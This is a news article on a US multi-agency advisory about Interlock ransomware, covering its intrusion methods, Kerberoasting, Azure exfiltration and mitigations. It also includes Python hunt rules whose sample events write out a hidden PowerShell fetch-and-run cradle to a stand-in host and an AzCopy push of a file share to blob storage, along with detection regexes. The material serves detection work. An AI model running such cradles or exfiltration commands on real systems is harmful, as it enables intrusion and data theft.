US Agencies Warn of Surging Interlock Ransomware Attacks


Four major U.S. agencies have issued a joint cybersecurity alert warning about the escalating threat posed by the Interlock ransomware operation, which has increasingly targeted businesses, healthcare providers, and critical infrastructure entities across North America and Europe. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) released the alert Tuesday as part of the #StopRansomware initiative. The agencies emphasized Interlock’s rapid evolution and its focus on high-impact sectors, particularly healthcare.

According to the advisory, Interlock emerged in September 2024 and has since launched financially motivated ransomware campaigns. The group employs a double-extortion model that involves both encrypting the victim’s system and stealing data, threatening to publish the stolen files if a ransom is not paid.

The gang does not include ransom demands in its initial notes. Instead, victims are given a unique code and directed to a .onion URL on the Tor network, where ransom negotiations take place.

Federal investigators say Interlock actors are opportunistic rather than targeting specific industries. Still, healthcare organizations have been frequent victims. Among the most high-profile victims are Kettering Health, a major Ohio-based healthcare system, and Fortune 500 kidney care company DaVita.

How Interlock gains entry

The FBI described Interlock’s initial tactics as “uncommon” among ransomware groups, citing drive-by downloads from compromised but otherwise legitimate websites. In these cases, the attackers disguise malicious payloads as fake updates for Google Chrome or Microsoft Edge.

Interlock also uses social engineering. One such tactic is “ClickFix,” which tricks the user into running attacker-supplied code, typically by pasting a command into the Windows Run dialog, under the pretense of fixing a system error or completing a verification step. A variation called “FileFix” achieves the same result through the Windows File Explorer address bar instead of the Run dialog, and has been used to deploy malware including remote access trojans (RATs) while evading security detection.

Once inside a system, Interlock deploys tools such as Interlock RAT and NodeSnake RAT to maintain control, communicate with command-and-control (C2) servers, and stage follow-on activity. The actors also use PowerShell scripts to download credential-stealing malware, such as cht.exe and klg.dll, which capture usernames, passwords, and keystrokes. Those credentials are then used for lateral movement across the network, and the group escalates privileges with techniques such as Kerberoasting, requesting service tickets for accounts that have service principal names and cracking the tickets offline to recover their passwords.

To move stolen data out of the victim environment, the group abuses legitimate Microsoft tools, Azure Storage Explorer and AzCopy, to push it to Azure blob storage it controls. On Linux systems, Interlock has been observed deploying a FreeBSD-based ELF encryptor, a rarity given that Linux ransomware payloads more commonly target VMware ESXi.
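To make the three stages above (ClickFix/FileFix execution, Kerberoasting, and AzCopy exfiltration) huntable, here is an added example that is not part of the advisory, the original article, or Interlock's tooling: three detection rules in Python run over constructed Sysmon process-creation events and Windows Security 4769 ticket-request events. The host names, user names, the example.invalid URL and the storage account name are invented sample data, and the allow-list of hosts permitted to run AzCopy is an assumed parameter.

```python
"""Hunt rules for the Interlock TTPs described above, run over constructed
Sysmon / Windows Security events (sample data, not real telemetry)."""
import re
from collections import defaultdict

# Constructed sample events in a flattened Sysmon / Security-log shape.
SAMPLE_EVENTS = [
    # ClickFix: user pastes a command into the Run dialog, so explorer.exe is the parent.
    {"EventID": 1, "Channel": "Sysmon", "Host": "WS01", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/x.txt | iex"'},
    # Benign: a user opens an interactive PowerShell console from the Start menu.
    {"EventID": 1, "Channel": "Sysmon", "Host": "WS02", "User": "CORP\\bob",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe"},
    # Kerberoasting: one account requests RC4 (0x17) service tickets for many SPNs.
    *[{"EventID": 4769, "Channel": "Security", "Host": "DC01",
       "TargetUserName": "alice@CORP.LOCAL", "ServiceName": svc,
       "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"}
      for svc in ("svc_sql", "svc_web", "svc_backup", "svc_ftp", "svc_mon")],
    # Benign: a normal AES256 (0x12) ticket request.
    {"EventID": 4769, "Channel": "Security", "Host": "DC01",
     "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.40"},
    # Exfiltration: AzCopy pushing a file share to attacker-controlled blob storage.
    {"EventID": 1, "Channel": "Sysmon", "Host": "FS01", "User": "CORP\\alice",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Temp\azcopy.exe",
     "CommandLine": r'azcopy.exe copy "\\FS01\finance" "https://stg.blob.core.windows.net/c?sv=2022&sig=..." --recursive'},
]

# Download-cradle fragments commonly pasted by ClickFix lures.
CRADLE = re.compile(
    r"(iwr\b|invoke-webrequest|downloadstring|downloadfile|-e(nc(odedcommand)?)?\b"
    r"|mshta\s+https?:|curl\s+https?:|\|\s*iex\b)",
    re.IGNORECASE)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe")
EXFIL_TOOLS = ("azcopy.exe", "storageexplorer.exe", "microsoft azure storage explorer.exe")
BLOB_HOST = re.compile(r"https?://[\w.-]+\.blob\.core\.windows\.net", re.IGNORECASE)


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect_clickfix(events):
    """Sysmon EID 1: explorer.exe spawning a script host with a download cradle.
    The explorer.exe parent is what both the Run dialog (ClickFix) and the File
    Explorer address bar (FileFix) leave behind; an interactive console without
    a cradle on its command line is left alone."""
    hits = []
    for e in events:
        if e.get("EventID") != 1 or e.get("Channel") != "Sysmon":
            continue
        if _basename(e["ParentImage"]) != "explorer.exe":
            continue
        if _basename(e["Image"]) not in SCRIPT_HOSTS:
            continue
        if CRADLE.search(e["CommandLine"]):
            hits.append({"rule": "clickfix_cradle", "host": e["Host"],
                         "user": e["User"], "cmd": e["CommandLine"]})
    return hits


def detect_kerberoasting(events, min_services=4):
    """Security EID 4769: one account requesting RC4 (0x17) service tickets for
    many distinct SPNs. Roasting tools ask for RC4 because it cracks fastest
    offline, so RC4 fan-out from a single account is the signal; AES requests
    (0x11/0x12) are ignored."""
    per_user = defaultdict(set)
    for e in events:
        if e.get("EventID") != 4769 or e.get("TicketEncryptionType") != "0x17":
            continue
        per_user[e["TargetUserName"]].add(e["ServiceName"])
    return [{"rule": "kerberoast_rc4_fanout", "user": u, "services": sorted(s)}
            for u, s in sorted(per_user.items()) if len(s) >= min_services]


def detect_azure_exfil(events, allowed_hosts=()):
    """Sysmon EID 1: AzCopy / Storage Explorer started with a blob endpoint on
    the command line, on a host not in the (assumed) allow-list of machines
    where those tools are expected to run."""
    hits = []
    for e in events:
        if e.get("EventID") != 1 or e.get("Channel") != "Sysmon":
            continue
        if _basename(e["Image"]) not in EXFIL_TOOLS or e["Host"] in allowed_hosts:
            continue
        m = BLOB_HOST.search(e["CommandLine"])
        if m:
            hits.append({"rule": "azure_blob_exfil", "host": e["Host"],
                         "user": e["User"], "destination": m.group(0)})
    return hits


def run_all(events, allowed_hosts=()):
    return (detect_clickfix(events) + detect_kerberoasting(events)
            + detect_azure_exfil(events, allowed_hosts))


if __name__ == "__main__":
    for hit in run_all(SAMPLE_EVENTS):
        print(hit)
```

Against the constructed events this yields exactly three hits, one per rule: the Run-dialog cradle on WS01, the RC4 fan-out by alice against five service accounts, and the AzCopy push from FS01 to a blob endpoint. The benign console launch and the AES ticket request produce nothing, and passing FS01 in `allowed_hosts` silences the exfiltration rule for that host.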

Protecting against Interlock attacks

To reduce the risk and impact of an Interlock ransomware attack, the federal advisory urges organizations to take the following steps:

  • Implement DNS filtering to block access to malicious websites
  • Use web application firewalls to filter harmful traffic
  • Keep systems and software updated and patched
  • Enforce multifactor authentication (MFA) for all accounts
  • Segment networks to contain threats and prevent lateral movement
  • Train employees to identify phishing and social engineering
  • Maintain secure, offline, and immutable backups of critical data

For a full list of mitigations and to access free cybersecurity resources, organizations are advised to visit stopransomware.gov. If your organization has been affected by ransomware or suspects malicious activity, contact your local FBI field office or report to CISA via the agency’s Incident Reporting System.
